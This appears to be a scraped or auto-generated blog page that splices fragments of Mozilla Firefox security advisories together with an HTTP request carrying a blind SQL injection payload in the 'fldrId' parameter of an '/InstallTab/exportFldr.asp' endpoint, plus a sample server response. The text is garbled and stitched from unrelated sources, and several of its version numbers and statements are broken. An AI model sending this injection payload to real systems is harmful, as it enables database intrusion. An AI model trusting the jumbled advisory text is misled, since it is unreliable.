![]() Other operating systems are not affected.*. ![]() This vulnerability affects Firefox = 4.2.4 and *Note: This attack requires local system access and only affects Windows. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. Mozilla developers and community members reported memory safety bugs present in Firefox 90. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh Intel Mac OS X 10.16 rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml q=0.9,image/webp,*/* q=0.8 Accept-Language: en-US,en q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA sessionId=30548861 agentguid=840997037507813 vsaUser=scopeId=3&roleId=2 webWindowId=59091519 ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Charset=Utf-8 Date: Thu, 17:33:53 GMT Strict-Transport-Security: max-age=63072000 includeSubDomains Connection: close Content-Length: 7960 Export Folder - SNIP - ``` SNIP- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. ![]() ![]() This vulnerability affects Firefox Whoops. The fix was included in the original release of Firefox 107. This vulnerability affects Firefox *Note*: This advisory was added on December 13th, 2022 after discovering it was inadvertently left out of the original advisory. Other operating systems are unaffected, and Mozilla is unable to enumerate all affected Linux Distributions.*. ![]() *This bug only affects Firefox for Linux on certain Distributions. desktop, which can be interpreted to run attacker-controlled commands. Firefox did not properly handle downloads of files ending in. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |